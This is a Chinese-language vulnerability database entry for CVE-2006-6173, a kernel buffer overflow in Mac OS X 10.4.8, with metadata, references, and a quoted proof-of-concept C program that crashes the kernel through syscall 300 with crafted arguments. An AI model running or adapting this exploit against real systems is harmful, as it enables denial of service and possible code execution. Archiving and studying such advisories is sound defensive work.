Apple Mac OS X Shared_Region_Make_Private_Np Kernel 函数缓存区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111682 漏洞类型 缓冲区溢出
发布时间 2006-11-29 更新时间 2007-03-14
CVE编号 CVE-2006-6173 CNNVD-ID CNNVD-200611-522
漏洞平台 OSX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/29201
https://www.securityfocus.com/bid/21349
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-522
|漏洞详情
MacOSX中的vm/vm_unix.c的shared_region_make_private_np函数存在缓冲区溢出,本地用户可以通过(1)小范围计数(导致内存分配不足)或(2)shared_region_make_private_np_args参数内的大量范围,来执行任意代码。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/21349/info

Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to a system call. 

Attackers may exploit this issue to cause a kernel panic, effectively denying further service to legitimate users. Due to the nature of this issue, successful exploits may potentially result in the execution of arbitrary machine code in the context of the affected kernel, but this has not been confirmed.

Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected.
*/


/*
 * Copyright 2006 (c) LMH <lmh@info-pull.com>.
 * All Rights Reserved.
 * ----           
 *               .---. .---. 
 *              :     : o   :    me want cookie and clues! L0W LEVA! - A 
J. H
 *          _..-:   o :     :-.._    / 
 *      .-''  '  `---' `---' "   ``-.    
 *    .'   "   '  "  .    "  . '  "  `. 
 *   :   '.---.,,.,...,.,.,.,..---.  ' ;
 *   `. " `.                     .' " .' kudos to ilja, kevin and icer.
 *    `.  '`.                   .' ' .'           "proof of concept" for
 *     `.    `-._           _.-' "  .'  .-------.       MOKB-28-11-2006.
 *       `. "    '"--...--"'  . ' .'  .'  · o   ·`.
 *       .'`-._'    " .     " _.-'`. :  C o C o A :
 *     .'      ```--.....--'''    ' `:_ o      o  :
 *   .'    "     '         "     "   ; `.;";";"; _'
 *  ;         '       "       '     . ; .' ; ; ;
 * ;     '         '       '   "    .'      .-'
 * '  "     "   '      "           "    _.-'
 */

#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>

int main() {
		/* shared_region_make_private_np = 300 (xnu-792.6.70), 
3rd arg unused */
        syscall(300, 0x8000000, 0xdeadface, 0xffffffff);
        return 0;
}
|受影响的产品
Apple Mac OS X Server 10.4.8 Apple Mac OS X Server 10.4.7 Apple Mac OS X Server 10.4.6 Apple Mac OS X Server 10.4.5 Apple Mac OS X Server 10.4.4 Apple Mac OS X Server 10.
|参考资料

来源:TA07-072A
名称:TA07-072A
链接:http://www.us-cert.gov/cas/techalerts/TA07-072A.html
来源:XF
名称:macos-sharedregion-privilege-escalation(30569)
链接:http://xforce.iss.net/xforce/xfdb/30569
来源:BID
名称:21349
链接:http://www.securityfocus.com/bid/21349
来源:VUPEN
名称:ADV-2006-4762
链接:http://www.frsirt.com/english/advisories/2006/4762
来源:SECTRACK
名称:1017306
链接:http://securitytracker.com/id?1017306
来源:SECUNIA
名称:23120
链接:http://secunia.com/advisories/23120
来源:MISC
链接:http://projects.info-pull.com/mokb/MOKB-28-11-2006.html
来源:SECTRACK
名称:1017751
链接:http://www.securitytracker.com/id?1017751
来源:VUPEN
名称:ADV-2007-0930
链接:http://www.frsirt.com/english/advisories/2007/0930
来源:SECUNIA
名称:24479
链接:http://secunia.com/advisories/24479
来源:APPLE
名称:APPLE-SA-2007-03-13
链接:http://lists.apple.com/archives/security-announce/2007/Mar/msg00002.html
来源:docs.info.apple.com
链接:http://docs.info.apple.com/article.html?artnum=305214